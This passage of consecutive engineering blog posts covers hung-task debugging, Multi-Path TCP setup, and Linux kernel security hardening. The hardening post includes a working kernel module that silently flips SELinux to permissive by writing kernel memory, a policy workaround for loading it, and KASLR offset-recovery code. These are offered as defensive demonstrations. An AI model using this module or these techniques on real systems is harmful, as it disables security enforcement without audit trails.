call. We continued debugging via a tool called drgn
, which is a programmable debugger that can debug a running kernel via a Python-like interactive shell. We still haven’t discovered the root cause for the Wireguard issue and have asked the upstream for help, but that is another story.
Summary: The hung task messages were the only ones which we had in the kernel log. Each stack trace of these messages was unique, but by carefully analyzing them, we could spot similarities and continue debugging with other instruments.
\n \n
Your system might have different hung task warnings, and we have many others not mentioned here. Each case is unique, and there is no standard approach to debug them. But hopefully this blog post helps you better understand why it’s good to have these warnings enabled, how they work, and what the meaning is behind them. We tried to provide some navigation guidance for the debugging process as well:
-
analyzing the stack trace might be a good starting point for debugging it, even if all the messages look unrelated, like we saw in example #3
-
keep in mind that the alert might be misleading, pointing to the victim and not the offender, as we saw in example #2 and example #3
-
if the kernel doesn’t schedule your application on the CPU, puts it in the D state, and emits the warning – the real problem might exist in the application code
Good luck with your debugging, and hopefully this material will help you on this journey!
Multi-Path TCP: revolutionizing connectivity, one path at a time
The Internet is designed to provide multiple paths between two endpoints. Attempts to exploit multi-path opportunities are almost as old as the Internet, culminating in RFCs documenting some of the challenges. Still, today, virtually all end-to-end communication uses only one available path at a time. Why? It turns out that in multi-path setups, even the smallest differences between paths can harm the connection quality due to packet reordering and other issues. As a result, Internet devices usually use a single path and let the routers handle the path selection.
There is another way. Enter Multi-Path TCP (MPTCP), which exploits the presence of multiple interfaces on a device, such as a mobile phone that has both Wi-Fi and cellular antennas, to achieve multi-path connectivity.
MPTCP has had a long history — see the Wikipedia article and the spec (RFC 8684) for details. It’s a major extension to the TCP protocol, and historically most of the TCP changes failed to gain traction. However, MPTCP is supposed to be mostly an operating system feature, making it easy to enable. Applications should only need minor code changes to support it.
There is a caveat, however: MPTCP is still fairly immature, and while its ability to use multiple paths gives it superpowers over regular TCP, it’s not always strictly better. Whether to use MPTCP instead of plain TCP is really a case-by-case decision.
In this blog post we show how to set up MPTCP to find out.
\n \n \n
Internally, MPTCP extends TCP by introducing “subflows”. When everything is working, a single TCP connection can be backed by multiple MPTCP subflows, each using different paths. This is a big deal – a single TCP byte stream is now no longer identified by a single 5-tuple. On Linux you can see the subflows with ss -M
, like:
\n
marek$ ss -tMn dport = :443 | cat
tcp   ESTAB 0  0 192.168.2.143%enx2800af081bee:57756 104.28.152.1:443
tcp   ESTAB 0  0 192.168.1.149%wlp0s20f3:44719       104.28.152.1:443
mptcp ESTAB 0  0 192.168.2.143:57756                 104.28.152.1:443
\n
Here you can see a single MPTCP connection, composed of two underlying TCP flows.
\n
MPTCP aspirations
\n \n \n \n
\n
Being able to separate the lifetime of a connection from the lifetime of a flow allows MPTCP to address two problems present in classical TCP: aggregation and mobility.
-
Aggregation: MPTCP can aggregate the bandwidth of many network interfaces. For example, in a data center scenario, it’s common to use interface bonding. A single flow can make use of just one physical interface. MPTCP, by being able to launch many subflows, can expose greater overall bandwidth. I’m personally not convinced if this is a real problem. As we’ll learn below, modern Linux has a BLESS-like MPTCP scheduler and macOS stack has the “aggregation” mode, so aggregation should work, but I’m not sure how practical it is. However, there are certainly projects that are trying to do link aggregation using MPTCP.
-
Mobility: On a customer device, a TCP stream is typically broken if the underlying network interface goes away. This is not an uncommon occurrence — consider a smartphone dropping from Wi-Fi to cellular. MPTCP can fix this — it can create and destroy many subflows over the lifetime of a single connection and survive multiple network changes.
Improving reliability for mobile clients is a big deal. While some software can use QUIC, which is also getting multipath extensions, a large number of classical services still use TCP. A great example is SSH: it would be very nice if you could walk around with a laptop, keep an SSH session open, and switch Wi-Fi networks seamlessly, without breaking the connection.
MPTCP work was initially driven by UCLouvain in Belgium. The first serious adoption was on the iPhone. Apparently, users have a tendency to use Siri while they are walking out of their home. It’s very common to lose Wi-Fi connectivity while they are doing this. (source)
\n
Implementations
\n \n \n \n
\n
Currently, there are only two major MPTCP implementations — Linux kernel support from v5.6, but realistically you need at least kernel v6.1 (MPTCP is not supported on Android yet) and iOS from version 7 / Mac OS X from 10.10.
Typically, Linux is used on the server side, and iOS/macOS as the client. It’s possible to get Linux to work as a client-side, but it’s not straightforward, as we’ll learn soon. Beware — there is plenty of outdated Linux MPTCP documentation. The code has had a bumpy history and at least two different APIs were proposed. See the Linux kernel source for the mainline API and the mptcp.dev website.
\n
Linux as a server
\n \n \n \n
\n
Conceptually, the MPTCP design is pretty sensible. After the initial TCP handshake, each peer may announce additional addresses (and ports) on which it can be reached. There are two ways of doing this. First, in the handshake TCP packet each peer specifies the “Do not attempt to establish new subflows to this address and port” bit, also known as bit [C], in the MPTCP TCP extensions header.
\n
Wireshark dissecting MPTCP flags from a SYN packet. Tcpdump does not report this flag yet.
With this bit cleared, the other peer is free to assume the two-tuple is fine to be reconnected to. Typically, the server allows the client to reuse the server IP/port address. Usually, the client is not listening and disallows the server to connect back to it. There are caveats though. For example, in the context of Cloudflare, where our servers are using Anycast addressing, reconnecting to the server IP/port won’t work. Going twice to the IP/port pair is unlikely to reach the same server. For us it makes sense to set this flag, disallowing clients from reconnecting to our server addresses. This can be done on Linux with:
\n
# Linux server sysctl - useful for ECMP or Anycast servers
$ sysctl -w net.mptcp.allow_join_initial_addr_port=0
\n
There is also a second way to advertise a listening IP/port. During the lifetime of a connection, a peer can send an ADD-ADDR MPTCP signal which advertises a listening IP/port. This can be managed on Linux by ip mptcp endpoint ... signal
, like:
\n
# Linux server - extra listening address
$ ip mptcp endpoint add 192.51.100.1 dev eth0 port 4321 signal
\n
With such a config, a Linux peer (typically server) will report the additional IP/port with ADD-ADDR MPTCP signal in an ACK packet, like this:
\n
host > host: Flags [.], ack 1, win 8, options [mptcp 30 add-addr v1 id 1 192.51.100.1:4321 hmac 0x...,nop,nop], length 0
\n
It’s important to realize that either peer can send ADD-ADDR messages. Unusual as it might sound, it’s totally fine for the client to advertise extra listening addresses. The most common scenario though, consists of either nobody, or just a server, sending ADD-ADDR.
Technically, to launch an MPTCP socket on Linux, you just need to replace IPPROTO_TCP with IPPROTO_MPTCP in the application code:
\n
IPPROTO_MPTCP = 262
sd = socket(AF_INET, SOCK_STREAM, IPPROTO_MPTCP)
\n
In practice, though, this introduces some changes to the sockets API. Currently not all setsockopt’s work yet — like TCP_USER_TIMEOUT
. Additionally, at this stage, MPTCP is incompatible with kTLS.
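Before going further, it is also worth confirming that MPTCP is enabled at all on the kernel you are running; kernels built with MPTCP support expose a dedicated sysctl for it, which defaults to on:

$ sysctl net.mptcp.enabled
net.mptcp.enabled = 1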
\n
Path manager / scheduler
\n \n \n \n
\n
Once the peers have exchanged the address information, MPTCP is ready to kick in and perform the magic. There are two independent pieces of logic that MPTCP handles. First, given the address information, MPTCP must figure out if it should establish additional subflows. The component that decides on this is called “Path Manager”. Then, another component called “scheduler” is responsible for choosing a specific subflow to transmit the data over.
Both peers have a path manager, but typically only the client uses it. A path manager has the hard task of launching enough subflows to get the benefits, but not so many that they waste resources. This is where the MPTCP stacks get complicated.
\n
Linux as client
\n \n \n \n
\n
On Linux, path manager is an operating system feature, not an application feature. The in-kernel path manager requires some configuration — it must know which IP addresses and interfaces are okay to start new subflows. This is configured with ip mptcp endpoint ... subflow
, like:
\n
$ ip mptcp endpoint add dev wlp1s0 192.0.2.3 subflow # Linux client
\n
This informs the path manager that we (typically a client) own a 192.0.2.3 IP address on interface wlp1s0, and that it’s fine to use it as source of a new subflow. There are two additional flags that can be passed here: “backup” and “fullmesh”. Maintaining these ip mptcp endpoints
on a client is annoying. They need to be added and removed every time networks change. Fortunately, NetworkManager from 1.40 supports managing these by default. If you want to customize the “backup” or “fullmesh” flags, you can do this here (see the documentation):
\n
ubuntu$ cat /etc/NetworkManager/conf.d/95-mptcp.conf
# set "subflow" on all managed "ip mptcp endpoints". 0x22 is the default.
[connection]
connection.mptcp-flags=0x22
\n
Path manager also takes a “limit” setting, to set a cap of additional subflows per MPTCP connection, and limit the received ADD-ADDR messages, like:
\n
$ ip mptcp limits set subflow 4 add_addr_accepted 2 # Linux client
\n
I experimented with the “mobility” use case on my Ubuntu 22 Linux laptop. I repeatedly enabled and disabled Wi-Fi and Ethernet. On new kernels (v6.12), it works, and I was able to hold a reliable MPTCP connection over many interface changes. I was less lucky with the Ubuntu v6.8 kernel. Unfortunately, the default path manager on Linux client only works when the flag “Do not attempt to establish new subflows to this address and port” is cleared on the server. Server-announced ADD-ADDR don’t result in new subflows created, unless ip mptcp endpoint
has a fullmesh
flag.
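In other words, to make a client act on server-announced ADD-ADDR today, the local endpoint has to be marked fullmesh explicitly, something like (reusing the address from the earlier example):

$ ip mptcp endpoint add dev wlp1s0 192.0.2.3 subflow fullmesh # Linux client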
It feels like the underlying MPTCP transport code works, but the path manager requires a bit more intelligence. With a new kernel, it’s possible to get the “interactive” case working out of the box, but not for the ADD-ADDR case.
\n
Custom path manager
\n \n \n \n
\n
Linux allows for two implementations of a path manager component. It can either use built-in kernel implementation (default), or userspace netlink daemon.
\n
$ sysctl -w net.mptcp.pm_type=1 # use userspace path manager
\n
However, from what I found, there is no serious implementation of a configurable userspace path manager. The existing implementations don’t do much, and the API still seems immature.
\n
Scheduler and BPF extensions
\n \n \n \n
\n
Thus far we’ve covered Path Manager, but what about the scheduler that chooses which link to actually use? It seems that on Linux there is only one built-in “default” scheduler, and it can do basic failover on packet loss. The developers want to write MPTCP schedulers in BPF, and this work is in-progress.
\n \n
As opposed to Linux, macOS and iOS expose a raw MPTCP API. On those operating systems, path manager is not handled by the kernel, but instead can be an application responsibility. The exposed low-level API is based on connectx()
. For example, here’s the rather obscure code that establishes one connection with two subflows:
\n
int sock = socket(AF_MULTIPATH, SOCK_STREAM, 0);
connectx(sock, ..., &cid1);
connectx(sock, ..., &cid2);
\n
This powerful API is hard to use though, as it would require every application to listen for network changes. Fortunately, macOS and iOS also expose higher-level APIs. One example is nw_connection in C, which uses nw_parameters_set_multipath_service.
Another, more common example is using Network.framework
, and would look like this:
\n
let parameters = NWParameters.tcp
parameters.multipathServiceType = .interactive
let connection = NWConnection(host: host, port: port, using: parameters)
\n
The API supports three MPTCP service type modes:
-
Handover Mode: Tries to minimize cellular. Uses only Wi-Fi. Uses cellular only when Wi-Fi Assist is enabled and makes such a decision.
-
Interactive Mode: Used for Siri. Reduces latency. Only for low-bandwidth flows.
-
Aggregation Mode: Enables resource pooling but it’s only available for developer accounts and not deployable.
\n
The MPTCP API is nicely integrated with the iPhone “Wi-Fi Assist” feature. While the official documentation is lacking, it’s possible to find sources explaining how it actually works. I was able to successfully test both the cleared “Do not attempt to establish new subflows” bit and ADD-ADDR scenarios. Hurray!
\n
IPv6 caveat
\n \n \n \n
\n
Sadly, MPTCP IPv6 has a caveat. Since IPv6 addresses are long, and MPTCP uses the space-constrained TCP Extensions field, there is not enough room for ADD-ADDR messages if TCP timestamps are enabled. If you want to use MPTCP and IPv6, it’s something to consider.
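One blunt mitigation, with its own trade-offs, is to disable TCP timestamps on the host that announces the addresses, which frees up TCP option space for the IPv6 ADD-ADDR:

$ sudo sysctl -w net.ipv4.tcp_timestamps=0   # despite the name, this also applies to TCP over IPv6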
\n \n
I find MPTCP very exciting, being one of a few deployable serious TCP extensions. However, current implementations are limited. My experimentation showed that the only practical scenario where currently MPTCP might be useful is:
-
Linux as a server
-
macOS/iOS as a client
-
“interactive” use case
With a bit of effort, Linux can be made to work as a client.
Don’t get me wrong, Linux developers did tremendous work to get where we are, but, in my opinion for any serious out-of-the-box use case, we’re not there yet. I’m optimistic that Linux can develop a good MPTCP client story relatively soon, and the possibility of implementing the Path manager and Scheduler in BPF is really enticing.
Time will tell if MPTCP succeeds — it’s been 15 years in the making. In the meantime, Multi-Path QUIC is under active development, but it’s even further from being usable at this stage.
We’re not quite sure if it makes sense for Cloudflare to support MPTCP. Reach out if you have a use case in mind!
Shoutout to Matthieu Baerts for tremendous help with this blog post.
Linux kernel security tunables everyone should consider adopting
The Linux kernel is the heart of many modern production systems. It decides when any code is allowed to run and which programs/users can access which resources. It manages memory, mediates access to hardware, and does a bulk of work under the hood on behalf of programs running on top. Since the kernel is always involved in any code execution, it is in the best position to protect the system from malicious programs, enforce the desired system security policy, and provide security features for safer production environments.
In this post, we will review some Linux kernel security configurations we use at Cloudflare and how they help to block or minimize a potential system compromise.
\n
Secure boot
\n \n \n \n
\n
When a machine (either a laptop or a server) boots, it goes through several boot stages:
\n
Within a secure boot architecture each stage from the above diagram verifies the integrity of the next stage before passing execution to it, thus forming a so-called secure boot chain. This way “trustworthiness” is extended to every component in the boot chain, because if we verified the code integrity of a particular stage, we can trust this code to verify the integrity of the next stage.
We have previously covered how Cloudflare implements secure boot in the initial stages of the boot process. In this post, we will focus on the Linux kernel.
Secure boot is the cornerstone of any operating system security mechanism. The Linux kernel is the primary enforcer of the operating system security configuration and policy, so we have to be sure that the Linux kernel itself has not been tampered with. In our previous post about secure boot we showed how we use UEFI Secure Boot to ensure the integrity of the Linux kernel.
But what happens next? After the kernel gets executed, it may try to load additional drivers, or as they are called in the Linux world, kernel modules. And kernel module loading is not confined just to the boot process. A module can be loaded at any time during runtime — a new device being plugged in and a driver is needed, some additional extensions in the networking stack are required (for example, for fine-grained firewall rules), or just manually by the system administrator.
However, uncontrolled kernel module loading might pose a significant risk to system integrity. Unlike regular programs, which get executed as user space processes, kernel modules are pieces of code which get injected and executed directly in the Linux kernel address space. There is no separation between the code and data in different kernel modules and core kernel subsystems, so everything can access everything. This means that a rogue kernel module can completely nullify the trustworthiness of the operating system and make secure boot useless. As an example, consider a simple Debian 12 (Bookworm installation), but with SELinux configured and enforced:
\n
ignat@dev:~$ lsb_release --all
No LSB modules are available.
Distributor ID: Debian
Description:    Debian GNU/Linux 12 (bookworm)
Release:        12
Codename:       bookworm
ignat@dev:~$ uname -a
Linux dev 6.1.0-18-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64 GNU/Linux
ignat@dev:~$ sudo getenforce
Enforcing
\n
Now we need to do some research. First, we see that we’re running 6.1.76 Linux Kernel. If we explore the source code, we would see that inside the kernel, the SELinux configuration is stored in a singleton structure, which is defined as follows:
\n
struct selinux_state {\n#ifdef CONFIG_SECURITY_SELINUX_DISABLE\n\tbool disabled;\n#endif\n#ifdef CONFIG_SECURITY_SELINUX_DEVELOP\n\tbool enforcing;\n#endif\n\tbool checkreqprot;\n\tbool initialized;\n\tbool policycap[__POLICYDB_CAP_MAX];\n\n\tstruct page *status_page;\n\tstruct mutex status_lock;\n\n\tstruct selinux_avc *avc;\n\tstruct selinux_policy __rcu *policy;\n\tstruct mutex policy_mutex;\n} __randomize_layout;
\n
From the above, we can see that if the kernel configuration has CONFIG_SECURITY_SELINUX_DEVELOP
enabled, the structure would have a boolean variable enforcing
, which controls the enforcement status of SELinux at runtime. This is exactly what the above $ sudo getenforce
command returns. We can double check that the Debian kernel indeed has the configuration option enabled:
\n
ignat@dev:~$ grep CONFIG_SECURITY_SELINUX_DEVELOP /boot/config-`uname -r`\nCONFIG_SECURITY_SELINUX_DEVELOP=y
\n
Good! Now that we have a variable in the kernel, which is responsible for some security enforcement, we can try to attack it. One problem though is the __randomize_layout
attribute: since CONFIG_SECURITY_SELINUX_DISABLE
is actually not set for our Debian kernel, normally enforcing
would be the first member of the struct. Thus if we know where the struct is, we immediately know the position of the enforcing
flag. With __randomize_layout
, during kernel compilation the compiler might place members at arbitrary positions within the struct, making it harder to create generic exploits. But arbitrary struct randomization within the kernel may introduce a performance impact, so it is often disabled in practice, and it is disabled for the Debian kernel:
\n
ignat@dev:~$ grep RANDSTRUCT /boot/config-`uname -r`\nCONFIG_RANDSTRUCT_NONE=y
\n
We can also confirm the compiled position of the enforcing
flag using the pahole tool and either kernel debug symbols, if available, or (on modern kernels, if enabled) in-kernel BTF information. We will use the latter:
\n
ignat@dev:~$ pahole -C selinux_state /sys/kernel/btf/vmlinux\nstruct selinux_state {\n\tbool enforcing; /* 0 1 */\n\tbool checkreqprot; /* 1 1 */\n\tbool initialized; /* 2 1 */\n\tbool policycap[8]; /* 3 8 */\n\n\t/* XXX 5 bytes hole, try to pack */\n\n\tstruct page * status_page; /* 16 8 */\n\tstruct mutex status_lock; /* 24 32 */\n\tstruct selinux_avc * avc; /* 56 8 */\n\t/* --- cacheline 1 boundary (64 bytes) --- */\n\tstruct selinux_policy * policy; /* 64 8 */\n\tstruct mutex policy_mutex; /* 72 32 */\n\n\t/* size: 104, cachelines: 2, members: 9 */\n\t/* sum members: 99, holes: 1, sum holes: 5 */\n\t/* last cacheline: 40 bytes */\n};
\n
So enforcing
is indeed located at the start of the structure and we don’t even have to be a privileged user to confirm this.
Great! All we need is the runtime address of the selinux_state
variable inside the kernel:
\n
ignat@dev:~$ sudo grep selinux_state /proc/kallsyms\nffffffffbc3bcae0 B selinux_state
\n
With all the information, we can write an almost textbook simple kernel module to manipulate the SELinux state:
mymod.c:
\n
#include <linux/module.h>\n\nstatic int __init mod_init(void)\n{\n\tbool *selinux_enforce = (bool *)0xffffffffbc3bcae0;\n\t*selinux_enforce = false;\n\treturn 0;\n}\n\nstatic void mod_fini(void)\n{\n}\n\nmodule_init(mod_init);\nmodule_exit(mod_fini);\n\nMODULE_DESCRIPTION("A somewhat malicious module");\nMODULE_AUTHOR("Ignat Korchagin <ignat@cloudflare.com>");\nMODULE_LICENSE("GPL");
\n
And the respective Kbuild
file:
\n
obj-m := mymod.o
\n
With these two files, we can build a full-fledged kernel module according to the official kernel docs:
\n
ignat@dev:~$ cd mymod/\nignat@dev:~/mymod$ ls\nKbuild mymod.c\nignat@dev:~/mymod$ make -C /lib/modules/`uname -r`/build M=$PWD\nmake: Entering directory '/usr/src/linux-headers-6.1.0-18-cloud-amd64'\n CC [M] /home/ignat/mymod/mymod.o\n MODPOST /home/ignat/mymod/Module.symvers\n CC [M] /home/ignat/mymod/mymod.mod.o\n LD [M] /home/ignat/mymod/mymod.ko\n BTF [M] /home/ignat/mymod/mymod.ko\nSkipping BTF generation for /home/ignat/mymod/mymod.ko due to unavailability of vmlinux\nmake: Leaving directory '/usr/src/linux-headers-6.1.0-18-cloud-amd64'
\n
If we try to load this module now, the system won’t allow it due to the SELinux policy:
\n
ignat@dev:~/mymod$ sudo insmod mymod.ko\ninsmod: ERROR: could not load module mymod.ko: Permission denied
\n
We can work around this by copying the module somewhere into the standard module path:
\n
ignat@dev:~/mymod$ sudo cp mymod.ko /lib/modules/`uname -r`/kernel/crypto/
\n
Now let’s try it out:
\n
ignat@dev:~/mymod$ sudo getenforce\nEnforcing\nignat@dev:~/mymod$ sudo insmod /lib/modules/`uname -r`/kernel/crypto/mymod.ko\nignat@dev:~/mymod$ sudo getenforce\nPermissive
\n
Not only did we disable the SELinux protection via a malicious kernel module, we did it quietly. Normal sudo setenforce 0
, even if allowed, would go through the official selinuxfs interface and would emit an audit message. Our code manipulated kernel memory directly, so no one was alerted. This illustrates why uncontrolled kernel module loading is so dangerous, and why most security standards and commercial security monitoring products advocate close monitoring of kernel module loading.
But we don’t need to monitor kernel modules at Cloudflare. Let’s repeat the exercise on a Cloudflare production kernel (module recompilation skipped for brevity):
\n
ignat@dev:~/mymod$ uname -a\nLinux dev 6.6.17-cloudflare-2024.2.9 #1 SMP PREEMPT_DYNAMIC Mon Sep 27 00:00:00 UTC 2010 x86_64 GNU/Linux\nignat@dev:~/mymod$ sudo insmod /lib/modules/`uname -r`/kernel/crypto/mymod.ko\ninsmod: ERROR: could not insert module /lib/modules/6.6.17-cloudflare-2024.2.9/kernel/crypto/mymod.ko: Key was rejected by service
\n
We get a Key was rejected by service
error when trying to load a module, and the kernel log will have the following message:
\n
ignat@dev:~/mymod$ sudo dmesg | tail -n 1\n[41515.037031] Loading of unsigned module is rejected
\n
This is because the Cloudflare kernel requires all the kernel modules to have a valid signature, so we don’t even have to worry about a malicious module being loaded at some point:
\n
ignat@dev:~$ grep MODULE_SIG_FORCE /boot/config-`uname -r`\nCONFIG_MODULE_SIG_FORCE=y
\n
For completeness, it is worth noting that the stock Debian kernel also supports module signatures, but does not enforce them:
\n
ignat@dev:~$ grep MODULE_SIG /boot/config-6.1.0-18-cloud-amd64\nCONFIG_MODULE_SIG_FORMAT=y\nCONFIG_MODULE_SIG=y\n# CONFIG_MODULE_SIG_FORCE is not set\n…
\n
The above configuration means that the kernel will validate a module signature if one is present. If there is no signature, the module will be loaded anyway, a warning message will be emitted, and the kernel will be tainted.
\n
Key management for kernel module signing
\n \n \n \n
\n
Signed kernel modules are great, but they create a key management problem: to sign a module we need a signing keypair that is trusted by the kernel. The public key of the keypair is usually directly embedded into the kernel binary, so the kernel can easily use it to verify module signatures. The private key of the pair needs to be protected and secure, because if it is leaked, anyone could compile and sign a potentially malicious kernel module which would be accepted by our kernel.
But what is the best way to eliminate the risk of losing something? Not to have it in the first place! Luckily, the kernel build system will generate a random keypair for module signing if none is provided. At Cloudflare, we use that feature to sign all the kernel modules during the kernel compilation stage. When the compilation and signing are done though, instead of storing the key in a secure place, we just destroy the private key:
\n
So with the above process:
-
The kernel build system generates a random keypair and compiles the kernel and modules
-
The public key is embedded into the kernel image, and the private key is used to sign all the modules
-
The private key is destroyed
With this scheme not only do we not have to worry about module signing key management, we also use a different key for each kernel we release to production. So even if a particular build process is hijacked and the signing key is not destroyed and potentially leaked, the key will no longer be valid when a kernel update is released.
There are some flexibility downsides though, as we can’t “retrofit” a new kernel module for an already released kernel (for example, for a new piece of hardware we are adopting). However, it is not a practical limitation for us as we release kernels often (roughly every week) to keep up with a steady stream of bug fixes and vulnerability patches in the Linux Kernel.
KEXEC
\n \n
KEXEC (or kexec_load()
) is an interesting system call in Linux, which allows one kernel to directly execute (or jump to) another kernel. The idea behind it is to switch/update/downgrade kernels faster, without going through a full reboot cycle, to minimize potential system downtime. However, it was developed quite a while ago, when secure boot and system integrity were not yet major concerns. As a result, its original design has security flaws: it is known to be able to bypass secure boot and potentially compromise system integrity.
We can see the problems just based on the definition of the system call itself:
\n
struct kexec_segment {\n\tconst void *buf;\n\tsize_t bufsz;\n\tconst void *mem;\n\tsize_t memsz;\n};\n...\nlong kexec_load(unsigned long entry, unsigned long nr_segments, struct kexec_segment *segments, unsigned long flags);
\n
So the kernel expects just a collection of buffers with code to execute. Back in those days there was not much desire to do a lot of data parsing inside the kernel, so the idea was to parse the to-be-executed kernel image in user space and provide the kernel with only the data it needs. Also, to switch kernels live, we need an intermediate program which would take over while the old kernel is shutting down and the new kernel has not yet been executed. In the kexec world this program is called purgatory. Thus the problem is evident: we give the kernel a bunch of code and it will happily execute it at the highest privilege level. But instead of the original kernel or purgatory code, we can easily provide code similar to the one demonstrated earlier in this post, which disables SELinux (or does something else to the kernel).
At Cloudflare we have had kexec_load()
disabled for some time now, precisely because of this. The advantage of faster reboots with kexec comes with a (small) risk of improperly initialized hardware, so it was not worth using even without the security concerns. However, kexec does provide one useful feature: it is the foundation of the Linux kernel crashdumping solution. In a nutshell, if a kernel crashes in production (due to a bug or some other error), a backup kernel (previously loaded with kexec) can take over, collect and save the memory dump for further investigation. This allows us to investigate kernel and other issues in production more effectively, so it is a powerful tool to have.
Luckily, since the original problems with kexec were outlined, Linux has developed an alternative, secure interface for kexec: instead of buffers with code, it expects file descriptors for the to-be-executed kernel image and initrd, and does the parsing inside the kernel. Thus, only a valid kernel image can be supplied. On top of this, we can configure kexec to require that the provided images are properly signed, so only authorized code can be executed in the kexec scenario. A secure configuration for kexec looks something like this:
\n
ignat@dev:~$ grep KEXEC /boot/config-`uname -r`\nCONFIG_KEXEC_CORE=y\nCONFIG_HAVE_IMA_KEXEC=y\n# CONFIG_KEXEC is not set\nCONFIG_KEXEC_FILE=y\nCONFIG_KEXEC_SIG=y\nCONFIG_KEXEC_SIG_FORCE=y\nCONFIG_KEXEC_BZIMAGE_VERIFY_SIG=y\n…
\n
Above we ensure that the legacy kexec_load()
system call is disabled by disabling CONFIG_KEXEC
, but we can still configure Linux kernel crashdumping via the new kexec_file_load()
system call (CONFIG_KEXEC_FILE=y)
with enforced signature checks (CONFIG_KEXEC_SIG=y
and CONFIG_KEXEC_SIG_FORCE=y
).
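To make the difference concrete, here is a minimal, hedged C sketch of loading a crash kernel through the file-based interface. The file paths, command line, and the crashkernel reservation are illustrative assumptions rather than our production values; the point is that the kernel receives file descriptors it can parse and signature-check, instead of opaque code buffers.
#include <fcntl.h>
#include <linux/kexec.h>
#include <stdio.h>
#include <sys/syscall.h>
#include <unistd.h>

int main(void)
{
	/* Requires root (CAP_SYS_BOOT) and a crashkernel= memory reservation. */
	int kernel_fd = open("/boot/vmlinuz", O_RDONLY);
	int initrd_fd = open("/boot/initrd.img", O_RDONLY);
	if (kernel_fd < 0 || initrd_fd < 0) {
		perror("open");
		return 1;
	}

	/* cmdline_len must include the terminating NUL byte. */
	const char cmdline[] = "console=ttyS0 maxcpus=1 reset_devices";

	/* With CONFIG_KEXEC_SIG_FORCE=y the kernel rejects unsigned images here. */
	if (syscall(SYS_kexec_file_load, kernel_fd, initrd_fd,
		    sizeof(cmdline), cmdline, KEXEC_FILE_ON_CRASH) != 0) {
		perror("kexec_file_load");
		return 1;
	}
	return 0;
}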
Note that the stock Debian kernel has the legacy kexec_load()
system call enabled and does not enforce signature checks for kexec_file_load()
(similar to module signature checks):
\n
ignat@dev:~$ grep KEXEC /boot/config-6.1.0-18-cloud-amd64\nCONFIG_KEXEC=y\nCONFIG_KEXEC_FILE=y\nCONFIG_ARCH_HAS_KEXEC_PURGATORY=y\nCONFIG_KEXEC_SIG=y\n# CONFIG_KEXEC_SIG_FORCE is not set\nCONFIG_KEXEC_BZIMAGE_VERIFY_SIG=y\n…
\n \n
Kernel Address Space Layout Randomization (KASLR)
\n \n \n \n
\n
Even on the stock Debian kernel, if you try to repeat the exercise we described in the “Secure boot” section of this post after a system reboot, you will likely see that it fails to disable SELinux now. This is because we hardcoded the kernel address of the selinux_state
structure in our malicious kernel module, but that address has changed after the reboot:
\n
ignat@dev:~$ sudo grep selinux_state /proc/kallsyms\nffffffffb41bcae0 B selinux_state
\n
Kernel Address Space Layout Randomization (or KASLR) is a simple concept: on each boot, it shifts the kernel code and data by a small random offset:
\n
This is to combat targeted exploitation (like the malicious module in this post) based on knowledge of the location of internal kernel structures and code. It is especially useful for popular Linux distribution kernels, like the Debian one, because most users run the same binary and anyone can download the debug symbols and the System.map file with all the addresses of the kernel internals. Just to note: KASLR will not prevent the module from loading and doing harm, but the module will likely not achieve the targeted effect of disabling SELinux. Instead, it will modify a random piece of kernel memory, potentially causing the kernel to crash.
Both the Cloudflare kernel and the Debian one have this feature enabled:
\n
ignat@dev:~$ grep RANDOMIZE_BASE /boot/config-`uname -r`\nCONFIG_RANDOMIZE_BASE=y
\n \n
Restricted kernel pointers
\n \n \n \n
\n
While KASLR helps with targeted exploits, it is quite easy to bypass, since everything is shifted by a single random offset as shown in the diagram above. Thus, if the attacker knows at least one runtime kernel address, they can recover this offset by subtracting the compile-time address of the same symbol (function or data structure), taken from the kernel’s System.map file, from its runtime address. Once they know the offset, they can recover the addresses of all other symbols by adjusting them by this offset.
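As a toy illustration of that arithmetic (the addresses below are made up, not real leaks), one leaked runtime pointer plus System.map is enough to relocate every other symbol:
#include <stdint.h>
#include <stdio.h>

int main(void)
{
	/* Compile-time addresses, as published in the distribution's System.map. */
	uint64_t map_selinux_state = 0xffffffff83abcae0ULL;
	uint64_t map_other_symbol  = 0xffffffff83a00000ULL;

	/* A single runtime address leaked from the running kernel. */
	uint64_t leaked_selinux_state = 0xffffffffb41bcae0ULL;

	/* The whole kernel is shifted by one offset... */
	uint64_t kaslr_offset = leaked_selinux_state - map_selinux_state;

	/* ...so every other symbol can be relocated the same way. */
	printf("runtime address of other symbol: 0x%llx\n",
	       (unsigned long long)(map_other_symbol + kaslr_offset));
	return 0;
}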
Therefore, modern kernels take precautions not to leak kernel addresses at least to unprivileged users. One of the main tunables for this is the kptr_restrict sysctl. It is a good idea to set it at least to 1
so that regular users cannot see kernel pointers:
\n
ignat@dev:~$ sudo sysctl -w kernel.kptr_restrict=1\nkernel.kptr_restrict = 1\nignat@dev:~$ grep selinux_state /proc/kallsyms\n0000000000000000 B selinux_state
\n
Privileged users can still see the pointers:
\n
ignat@dev:~$ sudo grep selinux_state /proc/kallsyms\nffffffffb41bcae0 B selinux_state
\n
Similar to the kptr_restrict sysctl, there is also dmesg_restrict, which, if set, prevents regular users from reading the kernel log (which may also leak kernel pointers via its messages). While you need to explicitly set the kptr_restrict sysctl to a non-zero value on each boot (or use some system sysctl configuration utility, like this one), you can configure the initial value of dmesg_restrict via the CONFIG_SECURITY_DMESG_RESTRICT
kernel configuration option. Both the Cloudflare kernel and the Debian one enforce dmesg_restrict this way:
\n
ignat@dev:~$ grep CONFIG_SECURITY_DMESG_RESTRICT /boot/config-`uname -r`\nCONFIG_SECURITY_DMESG_RESTRICT=y
\n
It is worth noting that /proc/kallsyms
and the kernel log are not the only sources of potential kernel pointer leaks. There is a lot of legacy in the Linux kernel, and new sources are continuously being found and patched. That’s why it is very important to stay up to date with the latest kernel bugfix releases.
\n
Lockdown LSM
\n \n \n \n
\n
Linux Security Modules (LSM) is a hook-based framework for implementing security policies and Mandatory Access Control in the Linux Kernel. We have covered our usage of another LSM module, BPF-LSM, previously.
BPF-LSM is a useful foundational piece for our kernel security, but in this post we want to mention another useful LSM module we use — the Lockdown LSM. Lockdown can be in three states (controlled by the /sys/kernel/security/lockdown
special file):
\n
ignat@dev:~$ cat /sys/kernel/security/lockdown\n[none] integrity confidentiality
\n
none
is the state where nothing is enforced and the module is effectively disabled. When Lockdown is in the integrity
state, the kernel tries to prevent any operation that may compromise its integrity. We already covered some examples of these in this post: loading unsigned modules and executing unsigned code via KEXEC. But there are other potential ways (mentioned in the LSM’s man page), all of which this LSM tries to block. confidentiality
